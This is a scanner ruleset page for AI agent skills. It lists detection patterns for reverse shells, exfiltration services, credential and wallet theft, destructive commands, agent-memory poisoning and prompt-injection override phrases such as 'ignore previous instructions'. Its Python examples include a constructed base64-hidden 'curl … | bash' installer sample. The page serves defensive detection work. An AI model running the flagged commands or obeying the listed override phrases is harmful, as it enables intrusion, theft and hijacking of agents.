Scanner Ruleset
v2026.03.01 (superseded March 2026). Major expansion adding 15 new detection categories aligned to the OWASP Agentic AI Threat Taxonomy. Introduces A–F safety scoring, base64 deep-scan, Unicode obfuscation detection, and CI-friendly --check and --ignore flags.
Code Execution
Dangerous runtime function calls that can execute arbitrary code or spawn external shell processes. Python rules use AST parsing to catch obfuscated aliases; JS/TS rules skip commented lines to reduce false positives.
| Rule ID | Severity | What it detects |
|---|---|---|
| py_eval | high | eval() — executes arbitrary Python code |
| py_exec | high | exec() — executes arbitrary Python code |
| py_compile | medium | compile() — compiles arbitrary source to a code object |
| py_dunder_import | high | `__import__()` — dynamic module import bypassing normal resolution |
| py_importlib | high | importlib.import_module() — dynamic import at runtime |
| py_os_system | high | os.system() — executes shell command via C system() |
| py_os_popen | high | os.popen() — opens a pipe to a shell command |
| py_subprocess_call | high | subprocess.call() — executes external command |
| py_subprocess_run | high | subprocess.run() — executes external command |
| py_subprocess_popen | high | subprocess.Popen() — spawns external process |
| py_subprocess_check_output | high | subprocess.check_output() — executes command and returns output |
| py_subprocess_check_call | high | subprocess.check_call() — executes command, raises on error |
| py_subprocess_getoutput | high | subprocess.getoutput() — runs command in shell, returns stdout+stderr |
| py_subprocess_getstatusoutput | high | subprocess.getstatusoutput() — runs command, returns (status, output) |
| js_eval | high | eval() — executes arbitrary JS at runtime |
| js_function_constructor | high | new Function() — constructs callable from arbitrary string |
| js_child_process | high | require('child_process') — enables shell command execution |
| js_exec_sync | high | execSync() / execFileSync() — synchronous shell execution |
| js_spawn_sync | high | spawnSync() — synchronous child process spawn |
| js_child_process_import | high | import … from 'child_process' — ESM shell command access |
| js_fs_import | medium | import … from 'fs' — ESM filesystem access |
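The description above says the Python rules use AST parsing rather than text matching so that aliased calls are still caught. The following is an added example written for this page, not the scanner's own code: a small AST visitor that records import aliases and resolves each call back to its fully qualified target before looking it up in the rule table. The `RULES` mapping is taken from the table above; the class and function names, and the sample source, are constructed for the example.

```python
import ast

# Fully qualified call target -> (rule_id, severity), taken from the table above.
RULES = {
    "eval": ("py_eval", "high"),
    "exec": ("py_exec", "high"),
    "compile": ("py_compile", "medium"),
    "__import__": ("py_dunder_import", "high"),
    "importlib.import_module": ("py_importlib", "high"),
    "os.system": ("py_os_system", "high"),
    "os.popen": ("py_os_popen", "high"),
    "subprocess.call": ("py_subprocess_call", "high"),
    "subprocess.run": ("py_subprocess_run", "high"),
    "subprocess.Popen": ("py_subprocess_popen", "high"),
    "subprocess.check_output": ("py_subprocess_check_output", "high"),
    "subprocess.check_call": ("py_subprocess_check_call", "high"),
    "subprocess.getoutput": ("py_subprocess_getoutput", "high"),
    "subprocess.getstatusoutput": ("py_subprocess_getstatusoutput", "high"),
}


class _CallFinder(ast.NodeVisitor):
    """Walk a module, tracking import aliases so calls resolve to their real target."""

    def __init__(self):
        self.aliases = {}   # local binding -> fully qualified dotted name
        self.findings = []  # (line, rule_id, severity, qualified_name)

    def visit_Import(self, node):
        for alias in node.names:
            if alias.asname:
                self.aliases[alias.asname] = alias.name   # import subprocess as sp
            else:
                top = alias.name.split(".")[0]
                self.aliases[top] = top                   # import os.path binds "os"
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        module = node.module or ""
        for alias in node.names:
            if alias.name != "*":                          # from os import system as s
                self.aliases[alias.asname or alias.name] = f"{module}.{alias.name}"
        self.generic_visit(node)

    def _qualify(self, func):
        # Flatten an a.b.c attribute chain to a dotted path, then expand the leading alias.
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if not isinstance(func, ast.Name):
            return None
        head = self.aliases.get(func.id, func.id)
        return ".".join([head] + parts[::-1])

    def visit_Call(self, node):
        target = self._qualify(node.func)
        if target in RULES:
            rule_id, severity = RULES[target]
            self.findings.append((node.lineno, rule_id, severity, target))
        self.generic_visit(node)


def scan_python(source):
    """Return (line, rule_id, severity, resolved_target) for each flagged call."""
    finder = _CallFinder()
    finder.visit(ast.parse(source))
    return finder.findings


# Constructed sample: the aliases hide the real targets from a naive text search.
SAMPLE = """
import subprocess as sp
from os import system as run_it
import importlib
cmd = "ls"
sp.run(cmd, shell=True)
run_it(cmd)
importlib.import_module("json")
print("harmless")
"""

if __name__ == "__main__":
    for line, rule_id, severity, target in scan_python(SAMPLE):
        print(f"line {line}: {rule_id} [{severity}] -> {target}")
```

The visitor resolves import aliases only; a binding created by plain assignment (`e = eval`) is not followed, which is one reason a scanner of this kind still reports `compile()` and `__import__()` separately rather than relying on a single resolved name.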
Hardcoded Credentials
Hardcoded secrets, API keys, and authentication tokens embedded in source code or configuration files. Matched context is automatically redacted in scan reports before upload.
| Rule ID | Severity | What it detects |
|---|---|---|
| aws_access_key | critical | AWS Access Key ID — `AKIA[0-9A-Z]{16}` |
| private_key | critical | PEM private key — `-----BEGIN … PRIVATE KEY-----` |
| github_token | critical | GitHub token — `gh[pousr]_[A-Za-z0-9_]{36,}` |
| slack_token | high | Slack token — `xox[bpars]-[0-9a-zA-Z-]{10,}` |
| generic_secret | high | Generic credential pattern — api_key=, secret_key=, access_token=, auth_token=, password= with ≥16-char value in quotes |
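The patterns in the table are plain regular expressions, and the section notes that matched context is redacted before a report leaves the machine. The following is an added example for this page, not the scanner's own code: the five rules as compiled patterns plus a redaction step that masks the matched value so the finding can be reported without reproducing the secret. The regexes are the ones listed above; the `generic_secret` rule is written with a named `secret` group so only the quoted value is masked. The function names and the sample configuration are constructed, and every value in it is fake.

```python
import re

# (rule_id, severity, pattern) from the table above. A named group "secret" marks the
# part to redact; rules without it redact the whole match.
CREDENTIAL_RULES = [
    ("aws_access_key", "critical", re.compile(r"AKIA[0-9A-Z]{16}")),
    ("private_key", "critical", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("github_token", "critical", re.compile(r"gh[pousr]_[A-Za-z0-9_]{36,}")),
    ("slack_token", "high", re.compile(r"xox[bpars]-[0-9a-zA-Z-]{10,}")),
    ("generic_secret", "high", re.compile(
        r"(?i)\b(?:api_key|secret_key|access_token|auth_token|password)\s*=\s*"
        r"['\"](?P<secret>[^'\"]{16,})['\"]")),
]


def redact(line, match):
    """Mask the secret in a matched line, keeping a 4-character prefix so the
    report still shows which kind of credential was found."""
    group = "secret" if "secret" in match.groupdict() else 0
    start, end = match.span(group)
    secret = line[start:end]
    return line[:start] + secret[:4] + "*" * (len(secret) - 4) + line[end:]


def scan_credentials(content):
    """Return (line_no, rule_id, severity, redacted_line) per matching line.
    Only the redacted form is returned, so callers cannot leak the raw value."""
    findings = []
    for line_no, line in enumerate(content.splitlines(), 1):
        for rule_id, severity, pattern in CREDENTIAL_RULES:
            match = pattern.search(line)
            if match:
                findings.append((line_no, rule_id, severity, redact(line, match)))
    return findings


# Constructed sample configuration; every value is fake.
SAMPLE_CONFIG = """# constructed sample, all values fake
AWS_KEY = AKIAABCDEFGHIJKLMNOP
api_key = "0123456789abcdef0123"
short_password = "abc"
SLACK = xoxb-000000000000-fake
"""

if __name__ == "__main__":
    for line_no, rule_id, severity, shown in scan_credentials(SAMPLE_CONFIG):
        print(f"line {line_no}: {rule_id} [{severity}] {shown}")
```

Note that `short_password = "abc"` is not reported: the value is shorter than the 16-character threshold the rule specifies, which is what keeps short placeholder values from producing noise.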
Data Exfiltration (New)
Outbound HTTP requests targeting known data collection, webhook relay, and exfiltration services. These services are frequently abused to receive stolen credentials or file contents.
| Rule ID | Severity | What it detects |
|---|---|---|
| shell_exfil_service | high | curl/wget to ngrok.io, requestbin.com, webhook.site, pipedream.net, canarytokens, or Burp Collaborator |
Agent Memory Poisoning (New)
Shell operations that write to AI agent memory and instruction files. A poisoned MEMORY.md or CLAUDE.md can persistently redirect agent behavior across sessions.
| Rule ID | Severity | What it detects |
|---|---|---|
| agent_memory_write | high | Shell redirect > to MEMORY.md, SOUL.md, CLAUDE.md, or .cursorrules |
| agent_memory_inject | high | echo … >> MEMORY.md / SOUL.md / CLAUDE.md (append injection) |
Encoded Malware (New)
Base64-encoded payloads designed to evade static analysis. The pattern-level rules catch explicit decode-and-execute pipelines; the deep-scan pass decodes every base64 blob ≥40 characters and re-applies all detection rules to the decoded content.
| Rule ID | Severity | What it detects |
|---|---|---|
| b64_decode_exec | critical | `… \| base64 -d \| bash` / sh / python / perl / ruby |
| b64_file_exec | critical | `base64 -d <file> \| bash` / sh |
| b64_encoded_payload | critical | Deep-scan: decoded blob contains `curl\|bash`, /dev/tcp/, rm -rf /, `wget\|bash`, Python socket import, or netcat -e |
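The deep-scan pass is the part of this category that a pattern-only scanner lacks: it decodes each long base64 run and runs the rules again on the result. The following is an added example for this page, not the scanner's own code, showing both layers together: the two pipeline rules as regexes, a base64 run finder with the 40-character threshold from the description, and a rescan of the decoded text that recurses so nested encodings are also covered. The indicator list is the one in the `b64_encoded_payload` row; the function names are constructed, and the sample script with its `example.invalid` host is constructed test input.

```python
import base64
import re

# Pattern-level rules for shell text, from the table above.
SHELL_RULES = [
    ("b64_decode_exec", "critical",
     re.compile(r"\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:bash|sh|python|perl|ruby)\b")),
    ("b64_file_exec", "critical",
     re.compile(r"base64\s+(?:-d|--decode)\s+\S+\s*\|\s*(?:bash|sh)\b")),
]

# Indicators the deep-scan checks inside decoded blobs (b64_encoded_payload row).
PAYLOAD_INDICATORS = re.compile(
    r"curl[^|\n]*\|\s*bash"
    r"|wget[^|\n]*\|\s*bash"
    r"|/dev/tcp/"
    r"|rm\s+-rf\s+/(?:\s|$)"
    r"|import\s+socket"
    r"|\b(?:nc|ncat|netcat)\b[^\n]*\s-e\b"
)

# A base64 run of at least 40 alphabet characters, with optional padding.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blob(blob):
    """Decode a base64 run (padding repaired); None if it is not valid base64."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def scan_shell(content, max_depth=2):
    """Return (rule_id, severity, evidence) findings for shell text. Base64 runs are
    decoded and rescanned up to max_depth levels deep; 0 disables the deep-scan."""
    findings = []
    for rule_id, severity, pattern in SHELL_RULES:
        for m in pattern.finditer(content):
            findings.append((rule_id, severity, m.group(0)))
    if max_depth > 0:
        for m in BASE64_RUN.finditer(content):
            decoded = decode_blob(m.group(0))
            if decoded is None:
                continue
            hit = PAYLOAD_INDICATORS.search(decoded)
            if hit:
                findings.append(("b64_encoded_payload", "critical", hit.group(0)))
            # Re-apply every rule to the decoded text; this also catches nested encoding.
            findings.extend(scan_shell(decoded, max_depth - 1))
    return findings


# Constructed sample: an "installer" whose real step is hidden in base64.
HIDDEN_STEP = "curl http://example.invalid/x.sh | bash\n"
BLOB = base64.b64encode(HIDDEN_STEP.encode()).decode()
SAMPLE_SCRIPT = f"""#!/bin/sh
echo "setting up"
echo {BLOB} | base64 -d | sh
"""

if __name__ == "__main__":
    for rule_id, severity, evidence in scan_shell(SAMPLE_SCRIPT):
        print(f"{rule_id} [{severity}]: {evidence!r}")
```

With the deep-scan disabled (`max_depth=0`) only the visible `| base64 -d | sh` pipeline is reported; with it enabled the decoded `curl … | bash` is reported as well, which is the difference the description draws between the pattern-level rules and the deep-scan pass.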
Privilege Escalation (New)
Operations that escalate a process to root or switch the active user context to a privileged account.
| Rule ID | Severity | What it detects |
|---|---|---|
| priv_escalation_sudo | high | sudo su · sudo bash · sudo sh · sudo -s · sudo -i |
| priv_setuid_root | critical | setuid(0) or seteuid(0) — sets process UID to root |
Persistence (New)
Mechanisms that survive reboots or new login sessions by registering with OS schedulers, init systems, or shell startup scripts.
| Rule ID | Severity | What it detects |
|---|---|---|
| persistence_cron | high | crontab -e / crontab -l · @reboot · /etc/cron.* |
| persistence_launchd | high | ~/Library/LaunchAgents · /Library/LaunchAgents · ~/Library/LaunchDaemons · /Library/LaunchDaemons |
| persistence_systemd | high | systemctl enable … · /etc/systemd/system/*.service |
| persistence_shell_profile | medium | echo … >> ~/.bashrc / .zshrc / .bash_profile / .profile / .bash_login / .zprofile |
Reverse Shell (New)
Network callbacks that open an interactive shell connection from the target machine back to an attacker-controlled host.
| Rule ID | Severity | What it detects |
|---|---|---|
| reverse_shell_devtcp | critical | `/dev/tcp/<ip>/<port>` or `/dev/udp/<ip>/<port>` — bash built-in TCP/UDP socket |
| reverse_shell_netcat | critical | nc / ncat / netcat with -e, -E, -c, -C, -l, or -L flag |
| reverse_shell_socat | critical | socat … EXEC … TCP — socat relayed shell |
| reverse_shell_bash | critical | bash -i or -I with >& /dev/tcp redirect |
Unicode Obfuscation (New)
Invisible or visually confusable Unicode characters used to hide malicious content from code reviewers while still being executed or interpreted by the runtime.
| Rule ID | Severity | What it detects |
|---|---|---|
| unicode_zero_width | high | Zero-width space / joiner / non-joiner / word-joiner / BOM — U+200B, U+200C, U+200D, U+2060, U+FEFF |
| unicode_cyrillic_mix | high | Cyrillic character adjacent to Latin letter — IDN homograph attack (e.g. аpple where а is Cyrillic U+0430) |
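Both rules above are code-point checks rather than regexes over visible text, which is why a reviewer reading the rendered file sees nothing wrong. The following is an added example for this page, not the scanner's own code: a detector that reports each of the five zero-width code points from the table by name, and each Cyrillic letter that sits directly next to a Latin letter, the homograph case the second rule describes. Script classification uses the Unicode character name from the standard library. The function names and the sample lines are constructed; `\u0430` in the sample is the Cyrillic small a mentioned in the table.

```python
import unicodedata

# Code points from the unicode_zero_width row, with their Unicode names.
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE (BOM)",
}


def script_of(ch):
    """Coarse script of a letter ("Cyrillic", "Latin", "Other") or None for non-letters."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    if name.startswith("CYRILLIC"):
        return "Cyrillic"
    if name.startswith("LATIN"):
        return "Latin"
    return "Other"


def scan_unicode(text):
    """Return (line_no, column, rule_id, severity, detail) for each finding."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        # Rule 1: invisible characters anywhere on the line.
        for col, ch in enumerate(line):
            if ch in ZERO_WIDTH:
                findings.append((line_no, col, "unicode_zero_width", "high",
                                 f"U+{ord(ch):04X} {ZERO_WIDTH[ch]}"))
        # Rule 2: a Cyrillic letter with a Latin letter on either side.
        scripts = [script_of(ch) for ch in line]
        for col, ch in enumerate(line):
            if scripts[col] != "Cyrillic":
                continue
            left = scripts[col - 1] if col > 0 else None
            right = scripts[col + 1] if col + 1 < len(line) else None
            if "Latin" in (left, right):
                findings.append((line_no, col, "unicode_cyrillic_mix", "high",
                                 f"{ch!r} (U+{ord(ch):04X}) adjacent to a Latin letter"))
    return findings


# Constructed samples; "\u0430" is Cyrillic small a, visually identical to Latin "a".
SAMPLE = (
    "curl https://\u0430pple.example/install.sh\n"  # homograph inside a hostname
    "echo ok\u200b\n"                                # invisible character after the text
    "Привет, мир\n"                                  # all-Cyrillic text is not flagged
)

if __name__ == "__main__":
    for line_no, col, rule_id, severity, detail in scan_unicode(SAMPLE):
        print(f"line {line_no} col {col}: {rule_id} [{severity}] {detail}")
```

The adjacency check is what keeps ordinary Cyrillic prose (the third sample line) from being reported: a homograph only works when a single confusable letter is embedded in an otherwise Latin identifier or hostname.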
ClickFix Social Engineering (New)
Instruction patterns that trick users into manually executing malicious commands by framing them as necessary troubleshooting or setup steps. Named after the ClickFix attack campaign.
| Rule ID | Severity | What it detects |
|---|---|---|
| clickfix_terminal | high | "Open terminal and paste…" / "Launch terminal and run/type/execute…" |
| clickfix_copy_paste | high | "Copy/paste this command/code/script into your terminal/console/command prompt" |
| clickfix_run_dialog | high | "Press Win+R and…" — Windows Run dialog social engineering |
Dangerous File Operations (New)
Irreversible destructive operations that can wipe filesystems or overwrite raw block devices.
| Rule ID | Severity | What it detects |
|---|---|---|
| dangerous_rm_root | critical | rm -rf / · rm -rf ~ · rm -rf $HOME — recursive delete of root or home |
| dangerous_dd_device | critical | dd of=/dev/sd* · /dev/hd* · /dev/nvme* · /dev/xvd* · /dev/vd* — raw block device overwrite |
Reconnaissance (New)
Network scanning tools and cloud instance metadata endpoints used to map infrastructure before a targeted attack.
| Rule ID | Severity | What it detects |
|---|---|---|
| recon_portscan | high | nmap · masscan · arp-scan · zmap · unicornscan |
| cloud_metadata_imds | critical | 169.254.169.254 — AWS, Azure, and GCP instance metadata service |
| cloud_metadata_gcp | critical | metadata.google.internal — GCP metadata server |
| cloud_metadata_alibaba | high | 100.100.100.200 — Alibaba Cloud metadata endpoint |
Prompt Injection
Instruction override patterns embedded in Markdown or configuration that attempt to hijack AI agent behavior by superseding the system prompt.
| Rule ID | Severity | What it detects |
|---|---|---|
| prompt_ignore_instructions | high | "ignore previous/prior/above instructions" |
| prompt_role_hijack | high | "you are now …" — role reassignment injection |
| prompt_system_prompt | medium | "system prompt" — system prompt reference |
| prompt_disregard | high | "disregard previous/prior instructions" |
| prompt_new_instructions | high | "new instructions:" — instruction block injection |
| prompt_override | high | "override previous/prior instructions" |
| prompt_forget | high | "forget everything/all/previous" |
| prompt_do_not_follow | high | "do not follow the previous/above instructions" |
Bundled Binaries (New)
Executable or native library files bundled inside a skill archive. Skills should contain only text-based instructions and scripts — precompiled binaries cannot be meaningfully reviewed by static analysis.
| Rule ID | Severity | What it detects |
|---|---|---|
| binary_file_bundled | high | .exe · .dll · .so · .dylib · .bin · .elf · .o · .a · .ko · .sys · .drv · .deb · .rpm · .msi · .pkg · .pyc · .pyo · .pyd |
Credential File Access (New)
Reads or directory searches targeting well-known credential storage locations on the host filesystem.
| Rule ID | Severity | What it detects |
|---|---|---|
| cred_read_aws | critical | cat/read/open ~/.aws/credentials |
| cred_read_docker | critical | cat/read/open ~/.docker/config.json — may contain registry authentication tokens |
| cred_find_dirs | high | find … .ssh / .aws / .gnupg / .config/gcloud — searching credential directories |
Cryptocurrency Targeting (New)
References to cryptocurrency wallet recovery material or wallet application data directories. Inspired by the ClawHavoc campaign (January 2026) where 341 malicious skills stole wallet seed phrases.
| Rule ID | Severity | What it detects |
|---|---|---|
| crypto_seed_phrase | critical | "seed phrase" / "mnemonic phrase" / "secret recovery phrase" / "wallet recovery phrase" |
| crypto_wallet_software | high | MetaMask · Phantom · Exodus · Electrum · Wasabi · Trezor · Ledger + wallet/keystore/password/seed keyword |
| crypto_wallet_dir | high | ~/.ethereum · ~/.bitcoin · ~/.monero · ~/.litecoin · ~/.dogecoin · ~/Library/Ethereum · ~/Library/Bitcoin |
Path Traversal (New)
Directory traversal patterns and direct reads of sensitive system files. Also covers writes to git hooks, which can persist malicious code across every future commit or merge.
| Rule ID | Severity | What it detects |
|---|---|---|
| path_traversal_sys | high | ../../etc · ../../root · ../../usr traversal patterns (2+ levels up targeting system dirs) |
| sensitive_sys_read | critical | cat/head/tail /etc/passwd · /etc/shadow · /etc/sudoers · /etc/hosts |
| git_hook_persist | medium | .git/hooks/pre-commit · post-commit · post-merge · pre-push · post-receive — possible persistence via git hooks |